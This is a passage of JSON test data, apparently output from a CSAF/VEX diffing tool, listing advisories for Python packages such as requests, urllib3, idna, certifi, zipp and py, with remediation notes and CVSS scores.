changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool. ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation. * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used. ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. 
### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7. ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": 
"LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected. However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. 
Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. ## Remediation * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. 
* Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, 
{"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store. GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": 
"UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. 
The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}, "result_14": {"diff_summary": {"test/csaf_1.json": {"document": {}, "product_tree": {}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": 
"2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}, {"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin. ## Remediation * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header. 
## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": 
"https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {"document": {}, "product_tree": {}, "vulnerabilities": []}}, "common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. 
Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}, {"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context. 
## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status 
changes request method to GET"}, {"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get): > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported. ## Affected usages Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised. ## Remediation You can remediate this vulnerability with any of the following steps: * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. 
* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body. ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": 
"Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}, {"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable 
